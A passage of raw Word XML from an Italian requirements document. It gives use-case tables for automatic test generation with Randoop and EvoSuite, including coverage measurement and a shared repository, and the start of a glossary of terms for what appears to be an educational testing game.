            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786C1BF2" w14:textId="60A69F1F" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="002B30C7">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1C02FD" w:rsidRPr="00715086" w14:paraId="689713D2"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4C07CCDB" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore secondario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624ABF3B" w14:textId="5A741737" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Randoop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="52DF6FC0"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E053E2" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66FEAA7D" w14:textId="5F6F0367" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="00851DA6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Vengono generate ed es</w:t>
            </w:r>
            <w:r w:rsidR="00C67B31" w:rsidRPr="00715086">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t xml:space="preserve">guite le classi di Test </w:t>
            </w:r>
            <w:r w:rsidR="00C67B31" w:rsidRPr="00715086">
              <w:t>di Randoop e</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t xml:space="preserve"> organizzate in livelli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="10EE6228"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60CEF9A1" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Pre-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F4B905E" w14:textId="2CBB3B78" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Esiste la classe per la quale si vogliono generare i test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="348E69E5"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3863B0" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D0CCE6" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00851DA6">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All’avvio dell’applicazione vengono generati i test per tutte le classi non ancora testate nel repository (vengono generati tanti livelli fino a raggiungere la saturazione)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C78AC94" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00851DA6">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Vengono eseguiti tali test per ottenere le coverage (EMMA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22551189" w14:textId="4FC5B52C" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B3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Classi di test e rispettive coverage sono salvate nel repository condiviso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="46E2614B"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568147B6" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Post-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38A902EF" w14:textId="481123F6" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="00851DA6" w:rsidP="00033B61">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>I test e le coverage delle classi di test sono salvati nel repository condiviso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C02FD" w:rsidRPr="00715086" w14:paraId="2B6AF5A4"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A307E2" w14:textId="77777777" w:rsidR="001C02FD" w:rsidRPr="00715086" w:rsidRDefault="001C02FD" w:rsidP="002B30C7">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi alternativi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ACA3CEC" w14:textId="3B400DF0" w:rsidR="00112F92" w:rsidRPr="00715086" w:rsidRDefault="00112F92">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pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Se una data classe presenta già i test Randoop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A723BC0" w14:textId="22022044" w:rsidR="00112F92" w:rsidRPr="00715086" w:rsidRDefault="00112F92">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pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Non sono generati nuovi test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45CB0A50" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="001C02FD"/>
    <w:p w14:paraId="2DF210F4" w14:textId="655A1062" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00C67B31">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc148195729"/>
      <w:r w:rsidRPr="00715086">
        <w:t>2.6.</w:t>
      </w:r>
      <w:r w:rsidR="002A070B" w:rsidRPr="00715086">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve"> Generazione Test EvoSuite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6798"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="4A5A350C" w14:textId="77777777" w:rsidTr="00532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81299F" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Caso d’uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08268F75" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">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C67B31" w:rsidRPr="00715086" w14:paraId="46AA9EEE"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B1FA62" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore primario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23DF4018" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">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C67B31" w:rsidRPr="00715086" w14:paraId="513657B3"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1A9FE283" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Attore secondario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02C16B19" w14:textId="23638576" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>EvoSuite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="5AB5B451"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CCF6205" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF02B31" w14:textId="70160663" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Vengono generate ed es</w:t>
            </w:r>
            <w:r w:rsidR="00112F92" w:rsidRPr="00715086">
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t xml:space="preserve">guite le classi di Test </w:t>
            </w:r>
            <w:r w:rsidR="00112F92" w:rsidRPr="00715086">
              <w:t>EvoSuite e</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:t xml:space="preserve"> organizzate in livelli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="6F380228"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07D36624" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Pre-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="540216F8" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Esiste la classe per la quale si vogliono generare i test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="33C540BA"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2B79F1B" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi principale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A3660B0" w14:textId="313E3F83" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31">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rsidRPr="00715086">
              <w:t>L’amministratore tramite shell esegue uno script per la generazione dei livelli (robot_generazione.sh)</w:t>
            </w:r>
            <w:r w:rsidR="00112F92" w:rsidRPr="00715086">
              <w:t>, indicando la classe e i livelli</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03281549" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31">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715086">
              <w:t>I Test e le rispettive coverage sono salvati nel repository condiviso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="10906953"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3150E3AF" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Post-condizioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073B7F54" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>I test e le coverage delle classi di test sono salvati nel repository condiviso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C67B31" w:rsidRPr="00715086" w14:paraId="1B79458F"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C0E42FB" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sequenza eventi alternativi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6798" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A2C95BC" w14:textId="77777777" w:rsidR="00C67B31" w:rsidRPr="00715086" w:rsidRDefault="00C67B31" w:rsidP="00532CD2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3428F94B" w14:textId="77777777" w:rsidR="00652020" w:rsidRPr="00715086" w:rsidRDefault="00652020" w:rsidP="001C02FD"/>
    <w:p w14:paraId="276CAF62" w14:textId="77777777" w:rsidR="00BC5849" w:rsidRPr="00715086" w:rsidRDefault="00BC5849" w:rsidP="001C02FD"/>
    <w:p w14:paraId="5A4D418F" w14:textId="5F1B55FD" w:rsidR="009953D2" w:rsidRPr="00715086" w:rsidRDefault="006A4D3E" w:rsidP="006A4D3E">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc148195730"/>
      <w:r w:rsidRPr="00715086">
        <w:t xml:space="preserve">2.7 </w:t>
      </w:r>
      <w:r w:rsidR="004413DB" w:rsidRPr="00715086">
        <w:t>Glossario dei termini</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="5670"/>
        <w:gridCol w:w="2120"/>
      </w:tblGrid>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="01A897A2" w14:textId="77777777" w:rsidTr="00593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F1469A" w14:textId="5362AE3A" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00593780">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Termine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="262E5DE2" w14:textId="6684D9C4" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00593780">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Descrizione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BD47C12" w14:textId="51E51FE6" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00593780">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Sinonimi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="64571F69" w14:textId="77777777" w:rsidTr="00D9077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838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BCDD434" w14:textId="1F41777C" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Giocatore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6252AB20" w14:textId="1A4AE618"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Persona che utilizza il sistema per giocare.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187BE6EF" w14:textId="2D811CEA"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Utente, Studente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="43DA7436"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7D5CEF02" w14:textId="07684694" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714A2732" w14:textId="7FC2A5B5"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Colui che si occupa dell’inserimento delle classi nel repository, e di verificare che siano generate le classi di test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44CE9297" w14:textId="613D17B0"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Amministratore</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="5E252CD6"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A90ECA" w14:textId="69D21BEE" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Robot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A926B0" w14:textId="68FB9143"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Componente in grado di generare Test automatici, si intendono Randoop ed EvoSuite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="423DF678" w14:textId="77777777"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="3A7AECD9"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53360660" w14:textId="5D594FB6" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F7BA6" w14:textId="44218304"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 xml:space="preserve">Cartella condivisa nella quale vengono caricate le classi da testare e salvati i </w:t>
            </w:r>
            <w:r w:rsidR="00560D39" w:rsidRPr="00715086">
              <w:t>Test e i rispettivi risultati di coverage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="335762ED" w14:textId="792E5483"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 xml:space="preserve">Volume, </w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:br/>
              <w:t>Cartella condivisa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="50A15EBF"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5DD62B" w14:textId="4F64EF01" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Classe sotto Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50EE147A" w14:textId="0DB6CFDC"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Classe Java per la quale l’utente ha scelto di scrivere il test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58946988" w14:textId="79368189"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Classe da testare,</w:t>
            </w:r>
            <w:r w:rsidRPr="00715086">
              <w:br/>
              <w:t>Class Under Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="209C5948"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6C9C67C0" w14:textId="6333D15E" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Classe di Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47451934" w14:textId="04D2E5C7"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Classe Java scritta dall’utente o generata da robot per testare la classe sotto test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40E4B263" w14:textId="7A14F221"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Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00593780" w:rsidRPr="00715086" w14:paraId="1E0C62D8"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759E4B" w14:textId="4E6F3454" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00593780" w:rsidP="00924466">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5670" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72118177" w14:textId="77777777" w:rsidR="00560D39" w:rsidRPr="00715086" w:rsidRDefault="00560D39" w:rsidP="00560D39">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t xml:space="preserve">Misura della quantità di codice sorgente che è stata </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D468C5F" w14:textId="60E2349C" w:rsidR="00593780" w:rsidRPr="00715086" w:rsidRDefault="00560D39" w:rsidP="00560D39">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00715086">
              <w:t>coperta da un insieme di test automatizzati, consideriamo in particolare le linee di codice coperte dai test.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2120" w:type="dxa"/>
          </w:tcPr>
